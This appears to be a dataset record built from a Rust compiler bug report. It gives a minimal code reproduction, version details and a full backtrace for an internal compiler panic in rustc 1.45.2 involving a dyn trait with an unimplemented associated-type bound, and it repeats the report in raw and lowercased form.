### Code ```Rust pub trait Callback { fn cb(); } pub trait Processing { type Call:Callback; } fn f<P:Processing+?Sized>() { P::Call::cb(); } fn main() { struct MyCall; f::<dyn Processing<Call=MyCall>>(); } ``` ### Meta <!-- If you're using the stable version of the compiler, you should also check if the bug also exists in the beta or nightly versions. --> `rustc --version --verbose`: ``` rustc 1.45.2 (d3fb005a3 2020-07-31) binary: rustc commit-hash: d3fb005a39e62501b8b0b356166e515ae24e2e54 commit-date: 2020-07-31 host: x86_64-apple-darwin release: 1.45.2 LLVM version: 10.0 ``` ### Error output ``` rustc src/main.rs error: internal compiler error: src/librustc_trait_selection/traits/codegen/mod.rs:62: Encountered error `Unimplemented` selecting `Binder(<main::MyCall as Callback>)` during codegen ``` <!-- Include a backtrace in the code block by setting `RUST_BACKTRACE=1` in your environment. E.g. `RUST_BACKTRACE=1 cargo build`. --> <details><summary><strong>Backtrace</strong></summary> <p> ``` thread 'rustc' panicked at 'Box<Any>', src/librustc_errors/lib.rs:907:9 stack backtrace: 0: <std::sys_common::backtrace::_print::DisplayBacktrace as core::fmt::Display>::fmt 1: core::fmt::write 2: std::io::Write::write_fmt 3: std::panicking::default_hook::{{closure}} 4: std::panicking::default_hook 5: rustc_driver::report_ice 6: std::panicking::rust_panic_with_hook 7: std::panicking::begin_panic 8: rustc_errors::HandlerInner::bug 9: rustc_errors::Handler::bug 10: rustc_middle::util::bug::opt_span_bug_fmt::{{closure}} 11: rustc_middle::ty::context::tls::with_opt::{{closure}} 12: rustc_middle::ty::context::tls::with_opt 13: rustc_middle::util::bug::opt_span_bug_fmt 14: rustc_middle::util::bug::bug_fmt 15: rustc_middle::ty::context::GlobalCtxt::enter_local 16: rustc_trait_selection::traits::codegen::codegen_fulfill_obligation 17: rustc_middle::ty::query::<impl rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::codegen_fulfill_obligation>::compute 18: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 19: rustc_data_structures::stack::ensure_sufficient_stack 20: rustc_query_system::query::plumbing::get_query_impl 21: rustc_ty::instance::resolve_instance 22: rustc_middle::ty::query::<impl rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::resolve_instance>::compute 23: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 24: rustc_data_structures::stack::ensure_sufficient_stack 25: rustc_query_system::query::plumbing::get_query_impl 26: rustc_middle::ty::instance::Instance::resolve 27: <rustc_mir::monomorphize::collector::MirNeighborCollector as rustc_middle::mir::visit::Visitor>::visit_terminator_kind 28: rustc_mir::monomorphize::collector::collect_neighbours 29: rustc_mir::monomorphize::collector::collect_items_rec 30: rustc_mir::monomorphize::collector::collect_items_rec 31: rustc_mir::monomorphize::collector::collect_crate_mono_items 32: rustc_mir::monomorphize::partitioning::collect_and_partition_mono_items 33: rustc_middle::ty::query::<impl rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::collect_and_partition_mono_items>::compute 34: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 35: rustc_data_structures::stack::ensure_sufficient_stack 36: rustc_query_system::query::plumbing::get_query_impl 37: rustc_codegen_ssa::base::codegen_crate 38: <rustc_codegen_llvm::LlvmCodegenBackend as rustc_codegen_ssa::traits::backend::CodegenBackend>::codegen_crate 39: rustc_interface::passes::start_codegen 40: rustc_middle::ty::context::tls::enter_global 41: rustc_interface::queries::Queries::ongoing_codegen 42: rustc_interface::interface::run_compiler_in_existing_thread_pool 43: rustc_ast::attr::with_globals note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace. note: the compiler unexpectedly panicked. this is a bug. note: we would appreciate a bug report: https://github.com/rust-lang/rust/blob/master/CONTRIBUTING.md#bug-reports note: rustc 1.45.2 (d3fb005a3 2020-07-31) running on x86_64-apple-darwin query stack during panic: #0 [codegen_fulfill_obligation] checking if `Callback` fulfills its obligations #1 [resolve_instance] resolving instance `<main::MyCall as Callback>::cb` #2 [collect_and_partition_mono_items] collect_and_partition_mono_items end of query stack error: aborting due to previous error ``` </p> </details>
1.0
unexpected panic when trait not implemented - ### Code ```Rust pub trait Callback { fn cb(); } pub trait Processing { type Call:Callback; } fn f<P:Processing+?Sized>() { P::Call::cb(); } fn main() { struct MyCall; f::<dyn Processing<Call=MyCall>>(); } ``` ### Meta <!-- If you're using the stable version of the compiler, you should also check if the bug also exists in the beta or nightly versions. --> `rustc --version --verbose`: ``` rustc 1.45.2 (d3fb005a3 2020-07-31) binary: rustc commit-hash: d3fb005a39e62501b8b0b356166e515ae24e2e54 commit-date: 2020-07-31 host: x86_64-apple-darwin release: 1.45.2 LLVM version: 10.0 ``` ### Error output ``` rustc src/main.rs error: internal compiler error: src/librustc_trait_selection/traits/codegen/mod.rs:62: Encountered error `Unimplemented` selecting `Binder(<main::MyCall as Callback>)` during codegen ``` <!-- Include a backtrace in the code block by setting `RUST_BACKTRACE=1` in your environment. E.g. `RUST_BACKTRACE=1 cargo build`. --> <details><summary><strong>Backtrace</strong></summary> <p> ``` thread 'rustc' panicked at 'Box<Any>', src/librustc_errors/lib.rs:907:9 stack backtrace: 0: <std::sys_common::backtrace::_print::DisplayBacktrace as core::fmt::Display>::fmt 1: core::fmt::write 2: std::io::Write::write_fmt 3: std::panicking::default_hook::{{closure}} 4: std::panicking::default_hook 5: rustc_driver::report_ice 6: std::panicking::rust_panic_with_hook 7: std::panicking::begin_panic 8: rustc_errors::HandlerInner::bug 9: rustc_errors::Handler::bug 10: rustc_middle::util::bug::opt_span_bug_fmt::{{closure}} 11: rustc_middle::ty::context::tls::with_opt::{{closure}} 12: rustc_middle::ty::context::tls::with_opt 13: rustc_middle::util::bug::opt_span_bug_fmt 14: rustc_middle::util::bug::bug_fmt 15: rustc_middle::ty::context::GlobalCtxt::enter_local 16: rustc_trait_selection::traits::codegen::codegen_fulfill_obligation 17: rustc_middle::ty::query::<impl rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::codegen_fulfill_obligation>::compute 18: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 19: rustc_data_structures::stack::ensure_sufficient_stack 20: rustc_query_system::query::plumbing::get_query_impl 21: rustc_ty::instance::resolve_instance 22: rustc_middle::ty::query::<impl rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::resolve_instance>::compute 23: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 24: rustc_data_structures::stack::ensure_sufficient_stack 25: rustc_query_system::query::plumbing::get_query_impl 26: rustc_middle::ty::instance::Instance::resolve 27: <rustc_mir::monomorphize::collector::MirNeighborCollector as rustc_middle::mir::visit::Visitor>::visit_terminator_kind 28: rustc_mir::monomorphize::collector::collect_neighbours 29: rustc_mir::monomorphize::collector::collect_items_rec 30: rustc_mir::monomorphize::collector::collect_items_rec 31: rustc_mir::monomorphize::collector::collect_crate_mono_items 32: rustc_mir::monomorphize::partitioning::collect_and_partition_mono_items 33: rustc_middle::ty::query::<impl rustc_query_system::query::config::QueryAccessors<rustc_middle::ty::context::TyCtxt> for rustc_middle::ty::query::queries::collect_and_partition_mono_items>::compute 34: rustc_query_system::dep_graph::graph::DepGraph<K>::with_task_impl 35: rustc_data_structures::stack::ensure_sufficient_stack 36: rustc_query_system::query::plumbing::get_query_impl 37: rustc_codegen_ssa::base::codegen_crate 38: <rustc_codegen_llvm::LlvmCodegenBackend as rustc_codegen_ssa::traits::backend::CodegenBackend>::codegen_crate 39: rustc_interface::passes::start_codegen 40: rustc_middle::ty::context::tls::enter_global 41: rustc_interface::queries::Queries::ongoing_codegen 42: rustc_interface::interface::run_compiler_in_existing_thread_pool 43: rustc_ast::attr::with_globals note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace. note: the compiler unexpectedly panicked. this is a bug. note: we would appreciate a bug report: https://github.com/rust-lang/rust/blob/master/CONTRIBUTING.md#bug-reports note: rustc 1.45.2 (d3fb005a3 2020-07-31) running on x86_64-apple-darwin query stack during panic: #0 [codegen_fulfill_obligation] checking if `Callback` fulfills its obligations #1 [resolve_instance] resolving instance `<main::MyCall as Callback>::cb` #2 [collect_and_partition_mono_items] collect_and_partition_mono_items end of query stack error: aborting due to previous error ``` </p> </details>
non_main
unexpected panic when trait not implemented code rust pub trait callback fn cb pub trait processing type call callback fn f p call cb fn main struct mycall f meta if you re using the stable version of the compiler you should also check if the bug also exists in the beta or nightly versions rustc version verbose rustc binary rustc commit hash commit date host apple darwin release llvm version error output rustc src main rs error internal compiler error src librustc trait selection traits codegen mod rs encountered error unimplemented selecting binder during codegen include a backtrace in the code block by setting rust backtrace in your environment e g rust backtrace cargo build backtrace thread rustc panicked at box src librustc errors lib rs stack backtrace fmt core fmt write std io write write fmt std panicking default hook closure std panicking default hook rustc driver report ice std panicking rust panic with hook std panicking begin panic rustc errors handlerinner bug rustc errors handler bug rustc middle util bug opt span bug fmt closure rustc middle ty context tls with opt closure rustc middle ty context tls with opt rustc middle util bug opt span bug fmt rustc middle util bug bug fmt rustc middle ty context globalctxt enter local rustc trait selection traits codegen codegen fulfill obligation rustc middle ty query for rustc middle ty query queries codegen fulfill obligation compute rustc query system dep graph graph depgraph with task impl rustc data structures stack ensure sufficient stack rustc query system query plumbing get query impl rustc ty instance resolve instance rustc middle ty query for rustc middle ty query queries resolve instance compute rustc query system dep graph graph depgraph with task impl rustc data structures stack ensure sufficient stack rustc query system query plumbing get query impl rustc middle ty instance instance resolve visit terminator kind rustc mir monomorphize collector collect neighbours rustc mir monomorphize collector collect items rec rustc mir monomorphize collector collect items rec rustc mir monomorphize collector collect crate mono items rustc mir monomorphize partitioning collect and partition mono items rustc middle ty query for rustc middle ty query queries collect and partition mono items compute rustc query system dep graph graph depgraph with task impl rustc data structures stack ensure sufficient stack rustc query system query plumbing get query impl rustc codegen ssa base codegen crate codegen crate rustc interface passes start codegen rustc middle ty context tls enter global rustc interface queries queries ongoing codegen rustc interface interface run compiler in existing thread pool rustc ast attr with globals note some details are omitted run with rust backtrace full for a verbose backtrace note the compiler unexpectedly panicked this is a bug note we would appreciate a bug report note rustc running on apple darwin query stack during panic checking if callback fulfills its obligations resolving instance cb collect and partition mono items end of query stack error aborting due to previous error
0
5,111
26,034,937,216
IssuesEvent
2022-12-22 03:14:52
centerofci/mathesar
https://api.github.com/repos/centerofci/mathesar
opened
Summarization suggestion aggregates columns instead of grouping, when the base column is a unique key column
type: bug work: backend status: ready restricted: maintainers
## Description * Select a table with a unique key column as the base table in Data Explorer Eg., Patrons * Add the unique key column, along with a few other columns. Eg., Email, first name, last name * Summarize by the unique key column. Expect the other columns to be grouped, instead notice that they are aggregated as a list.
True
Summarization suggestion aggregates columns instead of grouping, when the base column is a unique key column - ## Description * Select a table with a unique key column as the base table in Data Explorer Eg., Patrons * Add the unique key column, along with a few other columns. Eg., Email, first name, last name * Summarize by the unique key column. Expect the other columns to be grouped, instead notice that they are aggregated as a list.
main
summarization suggestion aggregates columns instead of grouping when the base column is a unique key column description select a table with a unique key column as the base table in data explorer eg patrons add the unique key column along with a few other columns eg email first name last name summarize by the unique key column expect the other columns to be grouped instead notice that they are aggregated as a list
1
4,582
23,804,191,525
IssuesEvent
2022-09-03 19:32:47
kjaymiller/Python-Community-News
https://api.github.com/repos/kjaymiller/Python-Community-News
closed
Starlite looking for Maintainers and Contributors
Content maintainers
### URL https://www.reddit.com/r/Python/comments/wz07o3/starlite_is_looking_for_contributors_and/ ### When was this post released 26 Aug 2022 ### Summary The maintainer of Starlite made a plea to the community looking for maintainers and organizers. This seemed to receive positive feedback as many folks offered to help. The maintainer claimed that: > it's a core pillar of Starlite to have multiple maintainers and be as open, inviting and accessible for contributions as we can be. If you're interested in being a maintainer you can check out the request on [r/python](https://www.reddit.com/r/Python/comments/wz07o3/starlite_is_looking_for_contributors_and/ ). ### Code of Conduct - [X] I agree to follow this project's Code of Conduct
True
Starlite looking for Maintainers and Contributors - ### URL https://www.reddit.com/r/Python/comments/wz07o3/starlite_is_looking_for_contributors_and/ ### When was this post released 26 Aug 2022 ### Summary The maintainer of Starlite made a plea to the community looking for maintainers and organizers. This seemed to receive positive feedback as many folks offered to help. The maintainer claimed that: > it's a core pillar of Starlite to have multiple maintainers and be as open, inviting and accessible for contributions as we can be. If you're interested in being a maintainer you can check out the request on [r/python](https://www.reddit.com/r/Python/comments/wz07o3/starlite_is_looking_for_contributors_and/ ). ### Code of Conduct - [X] I agree to follow this project's Code of Conduct
main
starlite looking for maintainers and contributors url when was this post released aug summary the maintainer of starlite made a plea to the community looking for maintainers and organizers this seemed to receive positive feedback as many folks offered to help the maintainer claimed that it s a core pillar of starlite to have multiple maintainers and be as open inviting and accessible for contributions as we can be if you re interested in being a maintainer you can check out the request on code of conduct i agree to follow this project s code of conduct
1
4,581
23,793,802,947
IssuesEvent
2022-09-02 17:08:43
Vivelin/SMZ3Randomizer
https://api.github.com/repos/Vivelin/SMZ3Randomizer
opened
Split out configs into a separate project
:wrench: maintainability
The current config system can't be accessed in the randomizer project. Because of that, the configs should be added to a unique project so that they can be accessed globally.
True
Split out configs into a separate project - The current config system can't be accessed in the randomizer project. Because of that, the configs should be added to a unique project so that they can be accessed globally.
main
split out configs into a separate project the current config system can t be accessed in the randomizer project because of that the configs should be added to a unique project so that they can be accessed globally
1
4,778
24,606,989,337
IssuesEvent
2022-10-14 17:12:07
duckduckgo/zeroclickinfo-longtail
https://api.github.com/repos/duckduckgo/zeroclickinfo-longtail
closed
Test issue, please ignore
Maintainer Input Requested
> used for back-end tests within the Community Platform repo. //cc @jbarrett
True
Test issue, please ignore - > used for back-end tests within the Community Platform repo. //cc @jbarrett
main
test issue please ignore used for back end tests within the community platform repo cc jbarrett
1
773,928
27,176,267,003
IssuesEvent
2023-02-18 02:46:05
CSAllenISD/2023-ISP-unIQue
https://api.github.com/repos/CSAllenISD/2023-ISP-unIQue
opened
Help Tree Homepage CSS/HTML
High Priority Help Tree HTML/CSS
The Help Tree Homepage will consist of interactive buttons that redirect the user to other sections of the site, prioritize ease of access and accessibility on this page; large and minimalistic for the most part.
1.0
Help Tree Homepage CSS/HTML - The Help Tree Homepage will consist of interactive buttons that redirect the user to other sections of the site, prioritize ease of access and accessibility on this page; large and minimalistic for the most part.
non_main
help tree homepage css html the help tree homepage will consist of interactive buttons that redirect the user to other sections of the site prioritize ease of access and accessibility on this page large and minimalistic for the most part
0
76,405
26,412,325,840
IssuesEvent
2023-01-13 13:17:53
vector-im/element-web
https://api.github.com/repos/vector-im/element-web
closed
Element shows "Decryption key withheld" when it wasn't
T-Defect S-Minor O-Occasional
When Element Android (and other clients based on matrix-android-sdk2) gets an `m.room_key_request` for a key that it doesn't have, it sends an `m.room_key.withheld` message with a code of `m.unavailable` (see [implementation](https://github.com/vector-im/element-android/blob/75de805417ffea6cd2b1647e098d1d32f8e3f17b/matrix-sdk-android/src/main/java/org/matrix/android/sdk/internal/crypto/IncomingKeyRequestManager.kt#L403)). Having received the `m.unavailable` response, Element-web shows "Decryption key withheld", which is misleading at best.
1.0
Element shows "Decryption key withheld" when it wasn't - When Element Android (and other clients based on matrix-android-sdk2) gets an `m.room_key_request` for a key that it doesn't have, it sends an `m.room_key.withheld` message with a code of `m.unavailable` (see [implementation](https://github.com/vector-im/element-android/blob/75de805417ffea6cd2b1647e098d1d32f8e3f17b/matrix-sdk-android/src/main/java/org/matrix/android/sdk/internal/crypto/IncomingKeyRequestManager.kt#L403)). Having received the `m.unavailable` response, Element-web shows "Decryption key withheld", which is misleading at best.
non_main
element shows decryption key withheld when it wasn t when element android and other clients based on matrix android gets an m room key request for a key that it doesn t have it sends an m room key withheld message with a code of m unavailable see having received the m unavailable response element web shows decryption key withheld which is misleading at best
0
136,510
11,049,329,690
IssuesEvent
2019-12-09 23:22:52
MangopearUK/European-Boating-Association--Theme
https://api.github.com/repos/MangopearUK/European-Boating-Association--Theme
closed
Test & audit: International Organization for Standardization (ISO)
Testing: second round
Page URL: https://eba.eu.com/technical/iso/ ## Table of contents - [x] **Task 1:** Perform automated audits _(10 tasks)_ - [x] **Task 2:** Manual standards & accessibility tests _(61 tasks)_ - [x] **Task 3:** Breakpoint testing _(15 tasks)_ - [x] **Task 4:** Re-run automated audits _(10 tasks)_ ## 1: Perform automated audits _(10 tasks)_ ### Lighthouse: - [x] Run "Accessibility" audit in lighthouse _(using incognito tab)_ - [x] Run "Performance" audit in lighthouse _(using incognito tab)_ - [x] Run "Best practices" audit in lighthouse _(using incognito tab)_ - [x] Run "SEO" audit in lighthouse _(using incognito tab)_ - [x] Run "PWA" audit in lighthouse _(using incognito tab)_ ### Pingdom - [x] Run full audit of the the page's performance in Pingdom ### Browser's console - [x] Check Chrome's console for errors ### Log results of audits - [x] Screenshot snapshot of the lighthouse audits - [x] Upload PDF of detailed lighthouse reports - [x] Provide a screenshot of any console errors ## 2: Manual standards & accessibility tests _(61 tasks)_ ### Forms - [x] Give all form elements permanently visible labels - [x] Place labels above form elements - [x] Mark invalid fields clearly and provide associated error messages - [x] Make forms as short as possible; offer shortcuts like autocompleting the address using the postcode - [x] Ensure all form fields have the correct requried state - [x] Provide status and error messages as WAI-ARIA live regions ### Readability of content - [x] Ensure page has good grammar - [x] Ensure page content has been spell-checked - [x] Make sure headings are in logical order - [x] Ensure the same content is available across different devices and platforms - [x] Begin long, multi-section documents with a table of contents ### Presentation - [x] Make sure all content is formatted correctly - [x] Avoid all-caps text - [x] Make sure data tables wider than their container can be scrolled horizontally - [x] Use the same design patterns to solve the same problems - [x] Do not mark up subheadings/straplines with separate heading elements ### Links & buttons #### Links - [x] Check all links to ensure they work - [x] Check all links to third party websites use `rel="noopener"` - [x] Make sure the purpose of a link is clearly described: "read more" vs. "read more about accessibility" - [x] Provide a skip link if necessary - [x] Underline links — at least in body copy - [x] Warn users of links that have unusual behaviors, like linking off-site, or loading a new tab (i.e. aria-label) #### Buttons - [x] Ensure primary calls to action are easy to recognize and reach - [x] Provide clear, unambiguous focus styles - [x] Ensure states (pressed, expanded, invalid, etc) are communicated to assistive software - [x] Ensure disabled controls are not focusable - [x] Make sure controls within hidden content are not focusable - [x] Provide large touch "targets" for interactive elements - [x] Make controls look like controls; give them strong perceived affordance - [x] Use well-established, therefore recognizable, icons and symbols ### Assistive technology - [x] Ensure content is not obscured through zooming - [x] Support Windows high contrast mode (use images, not background images) - [x] Provide alternative text for salient images - [x] Make scrollable elements focusable for keyboard users - [x] Ensure keyboard focus order is logical regarding visual layout - [x] Match semantics to behavior for assistive technology users - [x] Provide a default language and use lang="[ISO code]" for subsections in different languages - [x] Inform the user when there are important changes to the application state - [x] Do not hijack standard scrolling behavior - [x] Do not instate "infinite scroll" by default; provide buttons to load more items ### General accessibility - [x] Make sure text and background colors contrast sufficiently - [x] Do not rely on color for differentiation of visual elements - [x] Avoid images of text — text that cannot be translated, selected, or understood by assistive tech - [x] Provide a print stylesheet - [x] Honour requests to remove animation via the prefers-reduced-motion media query ### SEO - [x] Ensure all pages have appropriate title - [x] Ensure all pages have meta descriptions - [x] Make content easier to find and improve search results with structured data [Read more](https://developers.google.com/search/docs/guides/prototype) - [x] Check whether page should be appearing in sitemap - [x] Make sure page has Facebook and Twitter large image previews set correctly - [x] Check canonical links for page - [x] Mark as cornerstone content? ### Performance - [x] Ensure all CSS assets are minified and concatenated - [x] Ensure all JS assets are minified and concatenated - [x] Ensure all images are compressed - [x] Where possible, remove redundant code - [x] Ensure all SVG assets have been optimised - [x] Make sure styles and scripts are not render blocking - [x] Ensure large image assets are lazy loaded ### Other - [x] Make sure all content belongs to a landmark element - [x] Provide a manifest.json file for identifiable homescreen entries ## 3: Breakpoint testing _(15 tasks)_ ### Desktop - [x] Provide a full screenshot of **1920px** wide page - [x] Provide a full screenshot of **1500px** wide page - [x] Provide a full screenshot of **1280px** wide page - [x] Provide a full screenshot of **1024px** wide page ### Tablet - [x] Provide a full screenshot of **960px** wide page - [x] Provide a full screenshot of **800px** wide page - [x] Provide a full screenshot of **760px** wide page - [x] Provide a full screenshot of **650px** wide page ### Mobile - [x] Provide a full screenshot of **600px** wide page - [x] Provide a full screenshot of **500px** wide page - [x] Provide a full screenshot of **450px** wide page - [x] Provide a full screenshot of **380px** wide page - [x] Provide a full screenshot of **320px** wide page - [x] Provide a full screenshot of **280px** wide page - [x] Provide a full screenshot of **250px** wide page ## 4: Re-run automated audits _(10 tasks)_ ### Lighthouse: - [x] Run "Accessibility" audit in lighthouse _(using incognito tab)_ - [x] Run "Performance" audit in lighthouse _(using incognito tab)_ - [x] Run "Best practices" audit in lighthouse _(using incognito tab)_ - [x] Run "SEO" audit in lighthouse _(using incognito tab)_ - [x] Run "PWA" audit in lighthouse _(using incognito tab)_ ### Pingdom - [x] Run full audit of the the page's performance in Pingdom ### Browser's console - [x] Check Chrome's console for errors ### Log results of audits - [x] Screenshot snapshot of the lighthouse audits - [x] Upload PDF of detailed lighthouse reports - [x] Provide a screenshot of any console errors
1.0
Test & audit: International Organization for Standardization (ISO) - Page URL: https://eba.eu.com/technical/iso/ ## Table of contents - [x] **Task 1:** Perform automated audits _(10 tasks)_ - [x] **Task 2:** Manual standards & accessibility tests _(61 tasks)_ - [x] **Task 3:** Breakpoint testing _(15 tasks)_ - [x] **Task 4:** Re-run automated audits _(10 tasks)_ ## 1: Perform automated audits _(10 tasks)_ ### Lighthouse: - [x] Run "Accessibility" audit in lighthouse _(using incognito tab)_ - [x] Run "Performance" audit in lighthouse _(using incognito tab)_ - [x] Run "Best practices" audit in lighthouse _(using incognito tab)_ - [x] Run "SEO" audit in lighthouse _(using incognito tab)_ - [x] Run "PWA" audit in lighthouse _(using incognito tab)_ ### Pingdom - [x] Run full audit of the the page's performance in Pingdom ### Browser's console - [x] Check Chrome's console for errors ### Log results of audits - [x] Screenshot snapshot of the lighthouse audits - [x] Upload PDF of detailed lighthouse reports - [x] Provide a screenshot of any console errors ## 2: Manual standards & accessibility tests _(61 tasks)_ ### Forms - [x] Give all form elements permanently visible labels - [x] Place labels above form elements - [x] Mark invalid fields clearly and provide associated error messages - [x] Make forms as short as possible; offer shortcuts like autocompleting the address using the postcode - [x] Ensure all form fields have the correct requried state - [x] Provide status and error messages as WAI-ARIA live regions ### Readability of content - [x] Ensure page has good grammar - [x] Ensure page content has been spell-checked - [x] Make sure headings are in logical order - [x] Ensure the same content is available across different devices and platforms - [x] Begin long, multi-section documents with a table of contents ### Presentation - [x] Make sure all content is formatted correctly - [x] Avoid all-caps text - [x] Make sure data tables wider than their container can be scrolled horizontally - [x] Use the same design patterns to solve the same problems - [x] Do not mark up subheadings/straplines with separate heading elements ### Links & buttons #### Links - [x] Check all links to ensure they work - [x] Check all links to third party websites use `rel="noopener"` - [x] Make sure the purpose of a link is clearly described: "read more" vs. "read more about accessibility" - [x] Provide a skip link if necessary - [x] Underline links — at least in body copy - [x] Warn users of links that have unusual behaviors, like linking off-site, or loading a new tab (i.e. aria-label) #### Buttons - [x] Ensure primary calls to action are easy to recognize and reach - [x] Provide clear, unambiguous focus styles - [x] Ensure states (pressed, expanded, invalid, etc) are communicated to assistive software - [x] Ensure disabled controls are not focusable - [x] Make sure controls within hidden content are not focusable - [x] Provide large touch "targets" for interactive elements - [x] Make controls look like controls; give them strong perceived affordance - [x] Use well-established, therefore recognizable, icons and symbols ### Assistive technology - [x] Ensure content is not obscured through zooming - [x] Support Windows high contrast mode (use images, not background images) - [x] Provide alternative text for salient images - [x] Make scrollable elements focusable for keyboard users - [x] Ensure keyboard focus order is logical regarding visual layout - [x] Match semantics to behavior for assistive technology users - [x] Provide a default language and use lang="[ISO code]" for subsections in different languages - [x] Inform the user when there are important changes to the application state - [x] Do not hijack standard scrolling behavior - [x] Do not instate "infinite scroll" by default; provide buttons to load more items ### General accessibility - [x] Make sure text and background colors contrast sufficiently - [x] Do not rely on color for differentiation of visual elements - [x] Avoid images of text — text that cannot be translated, selected, or understood by assistive tech - [x] Provide a print stylesheet - [x] Honour requests to remove animation via the prefers-reduced-motion media query ### SEO - [x] Ensure all pages have appropriate title - [x] Ensure all pages have meta descriptions - [x] Make content easier to find and improve search results with structured data [Read more](https://developers.google.com/search/docs/guides/prototype) - [x] Check whether page should be appearing in sitemap - [x] Make sure page has Facebook and Twitter large image previews set correctly - [x] Check canonical links for page - [x] Mark as cornerstone content? ### Performance - [x] Ensure all CSS assets are minified and concatenated - [x] Ensure all JS assets are minified and concatenated - [x] Ensure all images are compressed - [x] Where possible, remove redundant code - [x] Ensure all SVG assets have been optimised - [x] Make sure styles and scripts are not render blocking - [x] Ensure large image assets are lazy loaded ### Other - [x] Make sure all content belongs to a landmark element - [x] Provide a manifest.json file for identifiable homescreen entries ## 3: Breakpoint testing _(15 tasks)_ ### Desktop - [x] Provide a full screenshot of **1920px** wide page - [x] Provide a full screenshot of **1500px** wide page - [x] Provide a full screenshot of **1280px** wide page - [x] Provide a full screenshot of **1024px** wide page ### Tablet - [x] Provide a full screenshot of **960px** wide page - [x] Provide a full screenshot of **800px** wide page - [x] Provide a full screenshot of **760px** wide page - [x] Provide a full screenshot of **650px** wide page ### Mobile - [x] Provide a full screenshot of **600px** wide page - [x] Provide a full screenshot of **500px** wide page - [x] Provide a full screenshot of **450px** wide page - [x] Provide a full screenshot of **380px** wide page - [x] Provide a full screenshot of **320px** wide page - [x] Provide a full screenshot of **280px** wide page - [x] Provide a full screenshot of **250px** wide page ## 4: Re-run automated audits _(10 tasks)_ ### Lighthouse: - [x] Run "Accessibility" audit in lighthouse _(using incognito tab)_ - [x] Run "Performance" audit in lighthouse _(using incognito tab)_ - [x] Run "Best practices" audit in lighthouse _(using incognito tab)_ - [x] Run "SEO" audit in lighthouse _(using incognito tab)_ - [x] Run "PWA" audit in lighthouse _(using incognito tab)_ ### Pingdom - [x] Run full audit of the the page's performance in Pingdom ### Browser's console - [x] Check Chrome's console for errors ### Log results of audits - [x] Screenshot snapshot of the lighthouse audits - [x] Upload PDF of detailed lighthouse reports - [x] Provide a screenshot of any console errors
non_main
test audit international organization for standardization iso page url table of contents task perform automated audits tasks task manual standards accessibility tests tasks task breakpoint testing tasks task re run automated audits tasks perform automated audits tasks lighthouse run accessibility audit in lighthouse using incognito tab run performance audit in lighthouse using incognito tab run best practices audit in lighthouse using incognito tab run seo audit in lighthouse using incognito tab run pwa audit in lighthouse using incognito tab pingdom run full audit of the the page s performance in pingdom browser s console check chrome s console for errors log results of audits screenshot snapshot of the lighthouse audits upload pdf of detailed lighthouse reports provide a screenshot of any console errors manual standards accessibility tests tasks forms give all form elements permanently visible labels place labels above form elements mark invalid fields clearly and provide associated error messages make forms as short as possible offer shortcuts like autocompleting the address using the postcode ensure all form fields have the correct requried state provide status and error messages as wai aria live regions readability of content ensure page has good grammar ensure page content has been spell checked make sure headings are in logical order ensure the same content is available across different devices and platforms begin long multi section documents with a table of contents presentation make sure all content is formatted correctly avoid all caps text make sure data tables wider than their container can be scrolled horizontally use the same design patterns to solve the same problems do not mark up subheadings straplines with separate heading elements links buttons links check all links to ensure they work check all links to third party websites use rel noopener make sure the purpose of a link is clearly described read more vs read more about accessibility provide a skip link if necessary underline links — at least in body copy warn users of links that have unusual behaviors like linking off site or loading a new tab i e aria label buttons ensure primary calls to action are easy to recognize and reach provide clear unambiguous focus styles ensure states pressed expanded invalid etc are communicated to assistive software ensure disabled controls are not focusable make sure controls within hidden content are not focusable provide large touch targets for interactive elements make controls look like controls give them strong perceived affordance use well established therefore recognizable icons and symbols assistive technology ensure content is not obscured through zooming support windows high contrast mode use images not background images provide alternative text for salient images make scrollable elements focusable for keyboard users ensure keyboard focus order is logical regarding visual layout match semantics to behavior for assistive technology users provide a default language and use lang for subsections in different languages inform the user when there are important changes to the application state do not hijack standard scrolling behavior do not instate infinite scroll by default provide buttons to load more items general accessibility make sure text and background colors contrast sufficiently do not rely on color for differentiation of visual elements avoid images of text — text that cannot be translated selected or understood by assistive tech provide a print stylesheet honour requests to remove animation via the prefers reduced motion media query seo ensure all pages have appropriate title ensure all pages have meta descriptions make content easier to find and improve search results with structured data check whether page should be appearing in sitemap make sure page has facebook and twitter large image previews set correctly check canonical links for page mark as cornerstone content performance ensure all css assets are minified and concatenated ensure all js assets are minified and concatenated ensure all images are compressed where possible remove redundant code ensure all svg assets have been optimised make sure styles and scripts are not render blocking ensure large image assets are lazy loaded other make sure all content belongs to a landmark element provide a manifest json file for identifiable homescreen entries breakpoint testing tasks desktop provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page tablet provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page mobile provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page provide a full screenshot of wide page re run automated audits tasks lighthouse run accessibility audit in lighthouse using incognito tab run performance audit in lighthouse using incognito tab run best practices audit in lighthouse using incognito tab run seo audit in lighthouse using incognito tab run pwa audit in lighthouse using incognito tab pingdom run full audit of the the page s performance in pingdom browser s console check chrome s console for errors log results of audits screenshot snapshot of the lighthouse audits upload pdf of detailed lighthouse reports provide a screenshot of any console errors
0
172,166
14,351,168,140
IssuesEvent
2020-11-30 00:11:36
ironsheep/RPi-Reporter-MQTT2HA-Daemon
https://api.github.com/repos/ironsheep/RPi-Reporter-MQTT2HA-Daemon
closed
Configuration for non linux initiated
documentation
